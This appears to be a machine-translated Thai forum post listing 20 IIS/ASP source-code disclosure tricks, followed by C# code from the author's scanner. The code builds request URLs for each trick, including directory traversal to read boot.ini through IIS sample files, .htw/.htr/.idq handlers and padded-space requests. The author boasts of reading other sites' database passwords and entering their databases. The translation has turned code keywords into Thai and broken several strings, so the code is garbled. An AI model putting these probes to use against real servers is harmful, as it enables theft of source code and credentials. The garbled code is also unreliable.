อย่างที่เราทราบกันดีว่าแพลตฟอร์ม Windows มีช่องโหว่มากมายแพทช์เป็นอีกหนึ่งอย่างต่อเนื่อง แต่ก็ไม่เพียงพอที่จะชดเชย ฉันสรุปวิธีการ 20 วิธีที่ฉันรู้เกี่ยวกับการดูซอร์สโค้ด ASP และเขียนแอปพลิเคชันใน C# เพื่อสแกนช่องโหว่เหล่านี้ แต่ในสองวันที่ผ่านมาฉันเห็นซอร์สโค้ดของเว็บไซต์หลายแห่งรวมถึงรหัสผ่านฐานข้อมูล ไปยังฐานข้อมูลและทำทุกอย่างที่คุณต้องการ ขั้นแรกให้แสดงรายการ 20 วิธีด้านล่าง:
| - %81 ::ข้อมูล %2e %2E%41SPS +.htr - longhtr . บัค codebrws.asp showcode.asp null.htw qfullhit.htw Qsumrhit.htw query.idq ค้นหา/qfullhit.htw Search/qsumrhit.htw iirturnh.htw .htw แปล: F |
10 ของช่องโหว่ข้างต้นถูกเพิ่มเข้ามาในไฟล์ ASP โดยตรงเช่น %81 คือ xxx.asp %81 : วิธี F ไม่สามารถใช้งานได้โดยตรงผ่านเบราว์เซอร์ ดาวน์โหลดทุกอย่างจากเว็บไซต์ของฉัน
| สวิตช์ (this.cbomethod.selectedIndex) - กรณี 0: // อ่านโดยตรง strrequestFile = strserver + strurl; หยุดพัก; กรณีที่ 5: //%2E%41SPS strRequestFile = strServer + strpath + strfirst + %2E %41SP; หยุดพัก; กรณีที่ 8: // longhtr strrequestFile = strserver + strurl + +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htr; หยุดพัก; กรณีที่ 10: //codebrws.asp strrequestFile = strserver + /iissamples/exair/howitworks/codebrws.asp?source= + strurl; หยุดพัก; กรณีที่ 11: //showcode.asp strrequestFile = strserver + /iissamples/exair/howitworks/codebrws.asp?source= + /msadc/../../../boot.ini; หยุดพัก; กรณีที่ 12: //null.htw strrequestFile = strserver + /null.htw?ciwebhitsfile= + strurl + %20 & cirestriction = none & cihilitepe = เต็ม; หยุดพัก; กรณีที่ 13: //qfullhit.htw strrequestFile = strserver + /iissamples/issamples/oop/qfullhit.htw? + ciwebhitsfile =/../../boot.ini & cirestriction = none + & cihilitepe = เต็ม; หยุดพัก; กรณีที่ 14: //qsumrhit.htw strrequestFile = strserver + /iissamples/issamples/oop/qsumrhit.htw? + ciwebhitsfile =/../../boot.ini & cirestriction = none + & cihilitepe = เต็ม; หยุดพัก; กรณีที่ 15: //query.idq strrequestFile = strserver + /query.idq?citemplate=/../../boot.ini +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx; หยุดพัก; กรณีที่ 16: //search/qfullhit.htw strrequestFile = strserver + /iissamples/exair/search/qfullhit.htw? + ciwebhitsfile =/../../boot.ini & cirestriction = none + & cihilitepe = เต็ม; หยุดพัก; กรณีที่ 17: // search/qsumrhit.htw strrequestFile = strserver + /iissamples/exair/search/qsumrhit.htw? + ciwebhitsfile =/../../boot.ini & cirestriction = none + & cihilitepe = เต็ม; หยุดพัก; กรณีที่ 18: //iirturnh.htw strrequestFile = strserver + /iishelp/iis/misc/iirturnh.htw? + ciwebhitsfile =/../../boot.ini & cirestriction = none + & cihilitepe = เต็ม; หยุดพัก; กรณีที่ 19: //.htw strrequestFile = strserver + strurl +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +%20%20%20%20%20%20%20%20%20%20%20%.htw? + ciwebhitsfile =/../../boot.ini & cirestriction = none + & cihilitepe = เต็ม; หยุดพัก; ค่าเริ่มต้น: strrequestFile = strserver + strurl + this.cbomethod.text; - |